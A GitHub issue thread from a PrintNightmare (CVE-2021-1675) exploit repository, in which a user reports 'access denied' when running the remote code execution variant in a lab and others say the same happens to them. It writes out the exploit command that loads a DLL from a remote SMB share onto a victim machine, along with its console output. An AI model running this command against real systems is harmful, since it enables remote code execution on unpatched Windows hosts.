search

cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
1.84k stars 583 forks source link

Access Denied on unpatched systems #51

Open bananabr opened 3 years ago

bananabr commented 3 years ago

Hi,

I am trying to use the RCE version of the exploit on an unpatched test environment with no success. The LPE attack works.

Domain Controller: image

Victim domain member: image

This is the result:

python3 CVE-2021-1675.py 'LAB/attacker:Password@victim_IP' '\\file_server_IP\nightmare\nightmare.dll'
[*] Connecting to ncacn_np:192.168.0.200[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.0.102\nightmare\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
  File "CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

Any help is appriciated.

wxh0000mm commented 3 years ago

me too

isounikeko commented 2 years ago

same here

iz4tow commented 7 months ago

same